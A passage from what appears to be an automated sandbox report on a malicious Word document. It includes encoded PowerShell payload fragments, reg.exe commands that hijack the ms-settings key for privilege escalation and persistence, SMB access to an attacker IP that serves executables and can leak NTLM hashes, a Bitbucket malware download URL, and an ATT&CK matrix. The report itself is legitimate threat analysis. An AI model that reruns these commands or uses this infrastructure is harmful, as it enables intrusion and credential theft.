BlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "[system.text.encoding]::unicode.getstring([system.convert]::frombase64string('zgb1ag4aywb0agkabwbuacaarwblahqalqbeaguaywbvag0acabyaguacwbzaguazabcahkadablaeeacgbyageaeqagahsacgakacaaiaagacaaiaagacaaiabbaemabqbkagwazqb0aeiaaqbuagqaaqbuagcakaapaf0acgagacaaiaagafaayqbyageabqagacgacgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafsauabhahiayqbtaguadablahiakabnageabgbkageadabvahiaeqasafyayqbsahuazqbgahiabwbtafaaaqbwaguababpag4azqasafyayqbsahuazqbgahiabwbtafaaaqbwaguababpag4azqbcahkauabyag8acablahiadab5ae4ayqbtaguakqbdaaoaiaagacaaiaagacaaiaagafsaygb5ahqazqbbaf0axqagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajaaoafqaaabyag8adwaoacialqbiahkadablaeeacgbyageaeqagagkacwagahiazqbxahuaaqbyaguazaaiackakqakacaaiaagacaakqakacaaiaagacaaiaagacaaiabqahiabwbjaguacwbzacaaewakacaaiaagacaaiaagacaaiaagacaaiaagafcacgbpahqazqatafyazqbyagiabwbzaguaiaaiaecazqb0ac0arablagmabwbtahaacgblahmacwblagqaqgb5ahqazqbbahiacgbhahkaigakacaaiaagacaaiaagacaaiaakagkabgbwahuadaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqaygb5ahqazqbbahiacgbhahkaiaapaaoaiaagacaaiaagacaaiaagacaaiaagacaajabvahuadabwahuadaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqakacaaiaagacaaiaagacaaiaakagcaegbpahaauwb0ahiazqbhag0aiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4aqwbvag0acabyaguacwbzagkabwbuac4arwb6agkacabtahqacgblageabqagacqaaqbuahaadqb0acwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapaaoaiaagacaaiaagacaaiaagacaaiaagacaajabnahoaaqbwafmadabyaguayqbtac4aqwbvahaaeqbuag8akaagacqabwb1ahqacab1ahqaiaapaaoaiaagacaaiaagacaaiaagacqazwb6agkacabtahqacgblageabqauaemababvahmazqaoackacgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacqaaqbuahaadqb0ac4aqwbsag8acwblacgakqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaawwbiahkadablafsaxqbdacaajabiahkadablae8adqb0aeeacgbyageaeqagad0aiaakag8adqb0ahaadqb0ac4avabvaeeacgbyageaeqaoackacgagacaaiaagacaaiaagacaavwbyagkadablac0atwb1ahqacab1ahqaiaakagiaeqb0aguatwb1ahqaqqbyahiayqb5aaoaiaagacaaiab9aaoafqakaaoawwbiahkadablafsaxqbdacaajabiahkadablaf8ayqbyahiayqb5acaapqagadmamqasadeamwa5acwaoaasadaalaawacwamaasadaalaawacwanaasadaalaaxadqaoqasadeanaa0acwamqa5admalaaxadeanaasadeamwawacwanaa4acwamgawacwanga5acwamqayadcalaa0adealaa5adyalaaxadaaoqasadeaoqa5acwamqazadmalaaxadealaa1acwamqa0adyalaa5acwamwa1acwamqa3adcalaayacwamqayadualaa5acwamqaxadealaaxadaamwasadyangasadcalaaxadcamqasadeamga5acwanaa2acwanga4acwanwa3acwamga0adgalaayaduamaasadcamaasadeaoaa2acwamgazadkalaa3adyalaaxadeaoqasadeamqaxacwamqaxadmalaayadmamqasadeanqa4acwamga0admalaaxadcanaasadiamwazacwaoqa3acwamgayadqalaaxadqamaasadkanaasadqaoaasadiamqa3acwamga0adialaaxadmaoaasadgalaa4adaalaa4adqalaayadiamaasadeamqazacwanaawacwamgazacwamqa0adealaayadaamgasadeanwazacwamgawadialaaxadkangasadeaoaaxacwaoaaxacwaoqa4acwanga2acwamwa3acwamgawadqalaaxadcanaasadkanqasadeanaaxacwamg
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "[system.text.encoding]::unicode.getstring([system.convert]::frombase64string('zgb1ag4aywb0agkabwbuacaarwblahqalqbeaguaywbvag0acabyaguacwbzaguazabcahkadablaeeacgbyageaeqagahsacgakacaaiaagacaaiaagacaaiabbaemabqbkagwazqb0aeiaaqbuagqaaqbuagcakaapaf0acgagacaaiaagafaayqbyageabqagacgacgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafsauabhahiayqbtaguadablahiakabnageabgbkageadabvahiaeqasafyayqbsahuazqbgahiabwbtafaaaqbwaguababpag4azqasafyayqbsahuazqbgahiabwbtafaaaqbwaguababpag4azqbcahkauabyag8acablahiadab5ae4ayqbtaguakqbdaaoaiaagacaaiaagacaaiaagafsaygb5ahqazqbbaf0axqagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajaaoafqaaabyag8adwaoacialqbiahkadablaeeacgbyageaeqagagkacwagahiazqbxahuaaqbyaguazaaiackakqakacaaiaagacaakqakacaaiaagacaaiaagacaaiabqahiabwbjaguacwbzacaaewakacaaiaagacaaiaagacaaiaagacaaiaagafcacgbpahqazqatafyazqbyagiabwbzaguaiaaiaecazqb0ac0arablagmabwbtahaacgblahmacwblagqaqgb5ahqazqbbahiacgbhahkaigakacaaiaagacaaiaagacaaiaakagkabgbwahuadaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqaygb5ahqazqbbahiacgbhahkaiaapaaoaiaagacaaiaagacaaiaagacaaiaagacaajabvahuadabwahuadaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqakacaaiaagacaaiaagacaaiaakagcaegbpahaauwb0ahiazqbhag0aiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4aqwbvag0acabyaguacwbzagkabwbuac4arwb6agkacabtahqacgblageabqagacqaaqbuahaadqb0acwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapaaoaiaagacaaiaagacaaiaagacaaiaagacaajabnahoaaqbwafmadabyaguayqbtac4aqwbvahaaeqbuag8akaagacqabwb1ahqacab1ahqaiaapaaoaiaagacaaiaagacaaiaagacqazwb6agkacabtahqacgblageabqauaemababvahmazqaoackacgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacqaaqbuahaadqb0ac4aqwbsag8acwblacgakqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaawwbiahkadablafsaxqbdacaajabiahkadablae8adqb0aeeacgbyageaeqagad0aiaakag8adqb0ahaadqb0ac4avabvaeeacgbyageaeqaoackacgagacaaiaagacaaiaagacaavwbyagkadablac0atwb1ahqacab1ahqaiaakagiaeqb0aguatwb1ahqaqqbyahiayqb5aaoaiaagacaaiab9aaoafqakaaoawwbiahkadablafsaxqbdacaajabiahkadablaf8ayqbyahiayqb5acaapqagadmamqasadeamwa5acwaoaasadaalaawacwamaasadaalaawacwanaasadaalaaxadqaoqasadeanaa0acwamqa5admalaaxadeanaasadeamwawacwanaa4acwamgawacwanga5acwamqayadcalaa0adealaa5adyalaaxadaaoqasadeaoqa5acwamqazadmalaaxadealaa1acwamqa0adyalaa5acwamwa1acwamqa3adcalaayacwamqayadualaa5acwamqaxadealaaxadaamwasadyangasadcalaaxadcamqasadeamga5acwanaa2acwanga4acwanwa3acwamga0adgalaayaduamaasadcamaasadeaoaa2acwamgazadkalaa3adyalaaxadeaoqasadeamqaxacwamqaxadmalaayadmamqasadeanqa4acwamga0admalaaxadcanaasadiamwazacwaoqa3acwamgayadqalaaxadqamaasadkanaasadqaoaasadiamqa3acwamga0adialaaxadmaoaasadgalaa4adaalaa4adqalaayadiamaasadeamqazacwanaawacwamgazacwamqa0adealaayadaamgasadeanwazacwamgawadialaaxadkangasadeaoaaxacwaoaaxacwaoqa4acwanga2acwamwa3acwamgawadqalaaxadcanaasadkanqasadeanaaxacwamgJump to behavior
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanSESSx
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: explorer.exe, 0000000E.00000002.633066156.0000000003B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8%ProgramFiles%\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

barindex
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\89.23.98.22\LN\Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\89.23.98.22\LN\Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\89.23.98.22\LN\GB.exe.ConfigJump to behavior
Opens network shares
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\89.23.98.22\LN\Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\89.23.98.22\LN\Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \\89.23.98.22\LN\GB.exe.ConfigJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\LNJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\LNJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\LNJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\desktop.iniJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\lnJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\putty.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\putty.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\rspro.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.icoJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\rspro.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.icoJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\rspro.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\rspro.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\rspro.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.icoJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.icoJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\pdf_filetype_icon_177525.icoJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\Jump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\Jump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\Jump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\putty.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exeJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\putty.exe.ConfigJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.22\ln\scandoc.exe.ConfigJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
Valid Accounts221
Scripting		1
DLL Side-Loading		1
DLL Side-Loading		221
Scripting		OS Credential Dumping1
File and Directory Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium2
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
Default Accounts13
Exploitation for Client Execution		1
BITS Jobs		1
Extra Window Memory Injection		1
Obfuscated Files or Information		LSASS Memory13
System Information Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
Encrypted Channel		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
Domain Accounts211
Command and Scripting Interpreter		1
Registry Run Keys / Startup Folder		12
Process Injection		1
Install Root Certificate		Security Account Manager2
Network Share Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Data Encrypted for ImpactDNS ServerEmail Addresses
Local Accounts1
PowerShell		Login Hook1
Registry Run Keys / Startup Folder		1
Timestomp		NTDS11
Security Software Discovery		Distributed Component Object ModelInput CaptureTraffic Duplication13
Application Layer Protocol		Data DestructionVirtual Private ServerEmployee Names
Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
Process Discovery		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection		Cached Domain Credentials21
Virtualization/Sandbox Evasion		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
External Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Modify Registry		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
Supply Chain CompromisePowerShellCronCron1
BITS Jobs		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Rundll32		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1365471 Sample: 42#U0430.doc Startdate: 21/12/2023 Architecture: WINDOWS Score: 100 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus detection for dropped file 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 7 other signatures 2->65 9 WINWORD.EXE 292 24 2->9         started        13 explorer.exe 8 4 2->13         started        15 explorer.exe 14 30 2->15         started        process3 file4 51 C:\Users\user\...\~DF23BD85EE3DE97CB5.TMP, Composite 9->51 dropped 71 Suspicious powershell command line found 9->71 73 Opens network shares 9->73 75 Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload) 9->75 17 GB.exe 1 4 9->17         started        20 powershell.exe 4 9->20         started        23 explorer.exe 9->23         started        25 rundll32.exe 15->25         started        signatures5 process6 file7 47 C:\Users\user\AppData\Local\...\test2.exe, PE32+ 17->47 dropped 27 cmd.exe 17->27         started        67 Uses cmd line tools excessively to alter registry or file data 20->67 69 Opens network shares 23->69 signatures8 process9 signatures10 77 Suspicious powershell command line found 27->77 79 Very long command line found 27->79 30 powershell.exe 12 5 27->30         started        34 xcopy.exe 2 27->34         started        37 cmd.exe 27->37         started        process11 dnsIp12 53 bitbucket.org 104.192.141.1, 443, 49164 AMAZON-02US United States 30->53 55 s3-w.us-east-1.amazonaws.com 30->55 57 2 other IPs or domains 30->57 81 Installs new ROOT certificates 30->81 83 Uses cmd line tools excessively to alter registry or file data 30->83 85 Powershell uses Background Intelligent Transfer Service (BITS) 30->85 39 reg.exe 1 30->39         started        41 reg.exe 1 30->41         started        43 reg.exe 30->43         started        45 reg.exe 30->45         started        49 C:\Users\user\AppData\Local\...\test2.exe, PE32+ 34->49 dropped file13 signatures14 process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
42#U0430.doc42%VirustotalBrowse
42#U0430.doc100%AviraHEUR/Macro.Downloader.AMAK.Gen
42#U0430.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMP100%AviraHEUR/Macro.Downloader.AMAK.Gen
C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMP100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exe11%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\persistent2\test2.exe11%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://go.micros0%URL Reputationsafe
http://go.micros0%URL Reputationsafe
http://java.sun.com0%URL Reputationsafe
http://java.sun.com0%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://java.co0%Avira URL Cloudsafe
http://java.co0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s3-w.us-east-1.amazonaws.com
54.231.199.241
truefalse
    		high
    bitbucket.org
    		104.192.141.1
    		truefalse
      		high
      bbuseruploads.s3.amazonaws.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://bbuseruploads.s3.amazonaws.compowershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.piriform.com/ccleaner)explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://crl.entrust.net/server1.crl0powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://ocsp.entrust.net03powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://bitbucket.orgpowershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
